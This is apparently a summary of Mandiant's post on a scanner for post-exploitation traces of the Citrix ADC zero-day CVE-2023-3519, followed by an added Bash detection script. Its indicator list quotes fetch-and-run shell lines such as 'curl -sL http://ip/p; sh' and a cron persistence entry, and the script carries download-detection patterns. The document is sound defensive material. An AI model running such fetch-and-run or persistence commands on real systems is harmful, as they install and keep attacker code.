Indicators of Compromise Scanner for Citrix ADC Zero-Day (CVE-2023-3519) | Mandiant

Mandiant released an IOC Scanner to detect post-exploitation artifacts from the Citrix NetScaler ADC/Gateway zero-day CVE-2023-3519 and published the tool on GitHub for use against live appliances or mounted forensic images. The scanner searches filesystem paths, shell history, NetScaler directories, permissions, crontab entries, and running processes; organizations should run it on exposed appliances and perform forensic follow-up if IOCs are found. #CVE-2023-3519 #CitrixADC

Keypoints

  • Mandiant published an IOC Scanner for post-exploitation activity related to CVE-2023-3519 and made it available on GitHub.
  • The scanner is designed to run on live Citrix ADC/Gateway appliances or mounted forensic images to look for evidence of compromise.
  • It inspects file system paths, shell history, NetScaler directory files, file permissions/ownership, crontab entries, and running processes for known IOCs.
  • The tool was developed in collaboration with Citrix and is based on indicators and behaviors observed during incident response engagements.
  • Mandiant warns the scanner cannot guarantee detection (logs may be missing, attackers may have removed traces) and recommends full forensic analysis if IOCs are found.
  • Users are encouraged to contribute additional indicators via the tool’s GitHub repository (pull requests or issues).
  • Download and usage instructions, plus releases, are provided from the Mandiant GitHub repository; contact [email protected] for assistance.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Initial access via the ADC zero-day that allows remote code execution (‘CVE-2023-3519 is a zero-day vulnerability that can enable remote code execution’).
  • [T1059] Command and Scripting Interpreter – Evidence collection focuses on attacker or suspicious commands found in shell history (‘Attacker or suspicious commands in the shell history’).
  • [T1053] Scheduled Task/Job – The scanner checks for suspicious crontab entries that may provide persistence (‘Suspicious crontab entries’).
  • [T1057] Process Discovery / Monitoring – The tool looks for suspicious running processes as indicators of active compromise (‘Suspicious running processes’).
  • [T1105] Ingress Tool Transfer / File Staging – Detection includes malicious files and file-system paths likely to be malware placed on the appliance (‘File system paths that are likely to be malware’ and ‘Files in NetScaler directories with contents matching known IOCs’).

Indicators of Compromise

  • [File paths] Malware or dropped payload locations on the appliance – examples: /tmp/.mal.sh, /var/nsinstall/evil_module (and other similar suspicious paths created by attackers)
  • [Shell history entries] Commands used by attackers to download or install tools – examples: “wget http://example[.]com/payload.sh”, “curl -sL http://ip/p; sh” (search shell histories for such entries)
  • [NetScaler directory files] Modified or malicious files in NetScaler configuration or installation directories – examples: altered ns.conf, unexpected files under /netscaler or /var/ns (and other files matching known IOC content)
  • [Crontab entries] Scheduled jobs used to maintain persistence – examples: “*/5 * * * * /tmp/.mal.sh”, unexpected root cron jobs added to /var/spool/cron or /etc/crontab
  • [Processes] Suspicious running processes or unexpected binaries – examples: “/tmp/.mal.sh” running as a persistent process, unknown binaries with odd ownership or timestamps

The IOC Scanner is a standalone Bash script from Mandiant (developed with Citrix) intended to identify evidence of successful CVE-2023-3519 exploitation by analyzing logs and forensic artifacts on live Citrix ADC/Gateway appliances or mounted images. It searches specific locations and artifacts: filesystem paths likely used to store malware, attacker commands in shell histories, files within NetScaler directories that match known IOC content, files with suspicious permissions/ownership, crontab entries used for persistence, and suspicious running processes.

Operators should run the scanner on all appliances that were vulnerable and publicly exposed, then follow up any findings with a full forensic examination to determine scope and impact; the tool is a best-effort detector and cannot guarantee a clean system (logs may be rolled, systems rebooted, or attackers may have removed traces or used rootkits). Download the script and release packages from the Mandiant GitHub repository and follow the README for usage instructions; contributions of high-confidence indicators are requested via pull requests or issues, and Mandiant can be contacted at [email protected] for investigation support.
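As an added illustration (not Mandiant's scanner or any code from its repository), the Bash sweep below walks a live root or a mounted image for the artifact classes listed above, using this page's illustrative paths and constructed patterns; the running-process check is left out because it only applies on a live appliance, and `make_sample_image` plants hypothetical artifacts so the sweep can be exercised offline.

```shell
#!/usr/bin/env bash
# Added illustration of the artifact classes the Mandiant scanner sweeps.
# Paths/patterns are this page's illustrative examples plus constructed
# values (hypothetical), not Mandiant's real indicator set.

SUSPICIOUS_PATHS="tmp/.mal.sh var/nsinstall/evil_module"          # page examples
HISTORY_RE='(^|[[:space:]])(wget|curl)[[:space:]].*(https?|ftp)://'  # downloads in a shell history
CRON_RE='(^|[[:space:]])/tmp/'                                    # cron jobs launched from /tmp

# scan_ioc_root ROOT: ROOT is "/" (live box) or a mounted image such as /mnt/adc.
# Prints one "category:detail" line per finding; exits 0 if clean, 1 if not.
scan_ioc_root() {
    local root="${1%/}" findings="" p f d m
    # 1. Known malware drop locations.
    for p in $SUSPICIOUS_PATHS; do
        [ -e "$root/$p" ] && findings+="path:/$p"$'\n'
    done
    # 2. Shell histories containing download commands (-n keeps the line number).
    for f in "$root"/root/.*_history "$root"/home/*/.*_history; do
        [ -f "$f" ] || continue
        m=$(grep -nE "$HISTORY_RE" "$f" | sed "s|^|history:${f#$root}:|")
        [ -n "$m" ] && findings+="$m"$'\n'
    done
    # 3. Cron persistence (FreeBSD-based NetScaler keeps user tabs in /var/cron/tabs).
    for f in "$root"/etc/crontab "$root"/var/cron/tabs/* "$root"/var/spool/cron/*; do
        [ -f "$f" ] || continue
        m=$(grep -nE "$CRON_RE" "$f" | sed "s|^|cron:${f#$root}:|")
        [ -n "$m" ] && findings+="$m"$'\n'
    done
    # 4. World-writable files in NetScaler dirs (ownership checks omitted to run unprivileged).
    for d in "$root"/netscaler "$root"/var/netscaler "$root"/var/nsinstall; do
        [ -d "$d" ] || continue
        m=$(find "$d" -type f -perm -o+w 2>/dev/null | sed "s|^$root|perm:|")
        [ -n "$m" ] && findings+="$m"$'\n'
    done
    printf '%s' "$findings"
    [ -z "$findings" ]
}

# make_sample_image DIR: plant constructed artifacts so the sweep can run offline.
make_sample_image() {
    local root="${1%/}"
    mkdir -p "$root/tmp" "$root/root" "$root/etc" "$root/netscaler"
    printf '#!/bin/sh\n' > "$root/tmp/.mal.sh"
    printf 'ls -la\ncurl -sL http://ip/p; sh\nexit\n' > "$root/root/.bash_history"
    printf '*/5 * * * * root /tmp/.mal.sh\n' > "$root/etc/crontab"
    printf 'x\n' > "$root/netscaler/drop" && chmod 666 "$root/netscaler/drop"
}
```

Any non-zero exit is a prompt for the full forensic examination the text calls for, not proof of compromise on its own, and a zero exit is not proof of a clean appliance.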

Read more: https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner